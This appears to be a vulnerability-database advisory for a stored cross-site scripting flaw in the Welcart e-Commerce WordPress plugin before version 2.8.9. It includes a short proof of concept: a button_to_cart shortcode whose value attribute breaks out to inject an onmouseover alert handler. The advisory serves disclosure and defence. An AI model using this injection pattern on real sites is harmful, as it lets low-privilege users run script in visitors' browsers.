Lucene search

K
wpexploitLana CodesWPEX-ID:A1C70C80-E952-4CC7-ACA0-C2DDE3FA08A9
HistoryDec 23, 2022 - 12:00 a.m.

Welcart e-Commerce < 2.8.9 - Contributor+ Stored XSS via Shortcode

2022-12-2300:00:00
Lana Codes
56
welcart e-commerce
stored xss
shortcode
first" product item
exploit
contributor+

0.001 Low

EPSS

Percentile

23.3%

The plugin does not validate and escapes one of its shortcode attributes, which could allow users with a role as low as a contributor to perform a Stored Cross-Site Scripting attack.

1. Add a product item to the plugin. The item name, for example, "first". You will also use this in the shortcode.


2. Exploit shortcode:

[button_to_cart item='first' value='SUBMIT" onmouseover="alert(1)" style="border:5px solid red;"']

0.001 Low

EPSS

Percentile

23.3%

Related for WPEX-ID:A1C70C80-E952-4CC7-ACA0-C2DDE3FA08A9